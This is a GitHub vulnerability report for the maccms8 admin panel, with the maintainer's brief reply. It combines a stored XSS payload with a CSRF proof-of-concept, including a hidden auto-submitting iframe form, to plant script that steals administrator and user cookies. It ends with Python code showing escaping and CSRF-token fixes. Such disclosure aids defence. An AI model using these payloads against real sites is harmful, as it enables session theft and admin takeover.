
There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies #2

Closed
Trepverterless opened this issue Oct 28, 2019 · 1 comment

Comments


Trepverterless commented Oct 28, 2019

XSS

An XSS vulnerability exists in the backend administrator article management area when adding and modifying categories.
Where the Chinese and English names are entered, enter
" onmousemove=alert(document.cookie) src=x, as shown in the following chart.
[screenshot 1]
Move the mouse over the label in the backend article management area and the administrator cookie will pop up, as shown in the following figure.
[screenshot 2]
User cookies will also pop up when the mouse moves over the title on the front page.
[screenshot 3]


CSRF

It is found that CSRF also exists when adding and modifying.
Before use:
[screenshot 4]
When the following page is constructed, the administrator can be induced to click it.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When the administrator visits the page and clicks:
[screenshot: click page]

Category added successfully
[screenshot: category added]


CSRF + XSS

Here, CSRF and XSS can be used together: attackers can use the CSRF vulnerability to add or modify the code carried in by article categories.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<body>
<p style="color:blue; text-align:center; font-size:60px;">You're by CSRF</p>
<iframe hidden width=1000 height=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
<script>
//Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>

After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie.
[screenshot: category with payload added via hidden iframe]
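The two defects reported above are independent and need separate fixes: the category name must be HTML-escaped in attribute context, and the `admin_data.php?ac=save` handler must reject cross-site form posts. The following Python is an added illustration of both checks, not maccms code; the payload is the one from the report, the function names, the session dict and the Origin comparison are assumptions, and the real fix would be written in the project's PHP.

```python
import html
import hmac
import secrets

# Constructed sample input: the category name payload from the report above.
PAYLOAD = 'test" onmousemove=alert(document.cookie) src=x'


def render_unsafe(name: str) -> str:
    """Vulnerable rendering: the name is written into an attribute verbatim,
    so the embedded quote closes title="..." and the rest becomes an event handler."""
    return f'<a title="{name}">{name}</a>'


def render_category_label(name: str) -> str:
    """Hardened rendering: escape &, <, > and both quote characters, so the
    value can neither close the attribute nor start a new tag."""
    safe = html.escape(name, quote=True)
    return f'<a title="{safe}">{safe}</a>'


def attribute_intact(rendered: str) -> bool:
    """True if nothing between title=" and the closing "> can terminate the attribute."""
    inner = rendered.split('title="', 1)[1].split('">', 1)[0]
    return '"' not in inner and '<' not in inner


def issue_csrf_token(session: dict) -> str:
    """Bind a random per-session token that the admin form must echo back."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def validate_admin_save(session: dict, form: dict, origin, site_origin: str) -> bool:
    """Admission check for the save request: the posted csrf_token must match the
    session's token (constant-time compare), and a request that carries an Origin
    header from another site, as a cross-site form post does, is rejected."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False
    if origin is not None and origin != site_origin:
        return False
    return True
```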

@magicblack
Owner

good!

Trepverterless changed the title from "后台存在csrf和XSS漏洞,可以结合两个漏洞,盗取用户cookie和管理员cookie" to "There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies" on Dec 2, 2019.